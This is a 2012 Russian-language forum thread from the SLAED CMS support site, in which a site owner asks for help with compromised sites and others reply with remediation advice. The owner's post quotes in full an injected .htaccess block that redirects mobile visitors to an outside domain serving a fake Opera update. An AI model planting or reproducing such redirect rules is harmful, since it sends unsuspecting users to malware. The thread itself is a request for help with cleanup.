Чтение RSS каналов

Форум

Открыть Ответить

Какой то вирус, помогите разобраться...

0

0
1
03.08.2012 00:00:5103.08.2012 00:44:25
В общем, суть в том, что на сайт нельзя зайти с мобильного устройства, сразу идет перенаправление на левый сайт, где предлагается якобы скачать новую версию оперы, на деле же - какое то приложение (для android), вероятно ворующее деньги со счета (благо у меня планшет, так что вирус после инсталляции себя никак не смог проявить). вот код, автоматически прописанный во все .htaccess файлы. уничтожить простым способом нельзя - тут же появляется опять... вот как раз где у него "ядро" - найти пока не могу...
заражены все сайты на аккаунте.
index.php сайтов не содержат подозрительного кода.
смена паролей каких-либо, не спасает.



RewriteEngine on

RewriteCond %{HTTP_ACCEPT} "text/vnd.wap.wml|application/vnd.wap.xhtml+xml" [NC,OR]

RewriteCond %{HTTP_USER_AGENT} "acs|alav|alca|amoi|audi|aste|avan|benq|bird|blac|blaz|brew|cell|cldc|cmd-" [NC,OR]

RewriteCond %{HTTP_USER_AGENT} "dang|doco|eric|hipt|inno|ipaq|java|jigs|kddi|keji|leno|lg-c|lg-d|lg-g|lge-" [NC,OR]

RewriteCond %{HTTP_USER_AGENT} "maui|maxo|midp|mits|mmef|mobi|mot-|moto|mwbp|nec-|newt|noki|opwv" [NC,OR]

RewriteCond %{HTTP_USER_AGENT} "palm|pana|pant|pdxg|phil|play|pluc|port|prox|qtek|qwap|sage|sams|sany" [NC,OR]

RewriteCond %{HTTP_USER_AGENT} "sch-|sec-|send|seri|sgh-|shar|sie-|siem|smal|smar|sony|sph-|symb|t-mo" [NC,OR]

RewriteCond %{HTTP_USER_AGENT} "teli|tim-|tosh|tsm-|upg1|upsi|vk-v|voda|w3cs|wap-|wapa|wapi" [NC,OR]

RewriteCond %{HTTP_USER_AGENT} "wapp|wapr|webc|winw|winw|xda|xda-" [NC,OR]

RewriteCond %{HTTP_USER_AGENT} "up.browser|up.link|windowssce|iemobile|mini|mmp" [NC,OR]

RewriteCond %{HTTP_USER_AGENT} "symbian|midp|wap|phone|pocket|mobile|pda|psp|PPC|Android" [NC]

RewriteCond %{HTTP_USER_AGENT} !macintosh [NC]

RewriteCond %{HTTP_USER_AGENT} !america [NC]

RewriteCond %{HTTP_USER_AGENT} !avant [NC]

RewriteCond %{HTTP_USER_AGENT} !iphone [NC]

RewriteCond %{HTTP_USER_AGENT} !download [NC]

RewriteCond %{HTTP_USER_AGENT} !windows-media-player [NC]

RewriteRule ^(.*)$ http://gofdoor.01g.info/blog/post.php?sid=24 [L,R=302]

###IDI_KURI_KRAPIVU###



Версия системы: SLAED CMS 2.6 Lite
Версия PHP: PHP 5
Сервер: Сервер в интернете
3.93

3.93
2
03.08.2012 13:06:1803.08.2012 14:15:32
Вариантов может быть несколько.

1. Уязвимость на стороне хостера, устаревшее программное обеспечения, неправильные настройки и прочее.

Решение: Обратится с вышеописанной проблемой к хостеру.


2. Уязвимость на стороне Вашего компьютера. Как правила заражение вирусом, который производит замену файлов на сервере по средствам ФТП от Вашего имени.

Решение: Проверить компьютер антивирусами и прочими таблетками.


3. Уязвимость системы. Обратите внимание что версия SLAED CMS 2.6 Lite и её дальнейшая разработка к сожалению уже давно не поддерживается.

1. Решение: http://www.slaed.net/forum-view-11548.html
а. Отключить поиск.
б. Если установлен, удалить Spaw 2 Редактор
в. Если используются сторонние разработки, возможны уязвимости в них.
г. Далее, обновить все файлы системы.

2. Решение: Перейти на актуальную версию SLAED CMS 5.1 Pro (Существует анализатор всех действий на сайте, который предназначен для решения и выявления подобных проблем) или Open SLAED 1.3

О сколько нам открытий чудных,
Готовит просвещенья дух,
И опыт, сын ошибок трудных,
И гений, парадоксов друг...
3.24

3.24
3
04.08.2012 07:41:18
Вот немного полезной инфы по этому делу
http://webmaster.ya.ru/replies.xml?item_no=12778

я как то другой вирус хватал удалял таким способом.

еще такая инфа

Удалил вирус(удалил вредоносный код с htaccess). Поменял права доступа на 664 зашел в панель хостинга. Удалил всех пользователей ftp, создал нового + пароли, потом мониторил.

4.6

4.6
Открыть Ответить
Хотите опробовать SLAED CMS в действии?

Технологии

PHP MySQL HTML 5 CSS 3 jQuery jQuery UI

Контакты

  • D-49179, Deutschland
    Ostercappeln, Im Siek 6
  • +49 176 61966679

  • https://slaed.net
Идеи и предложения
Обратная связь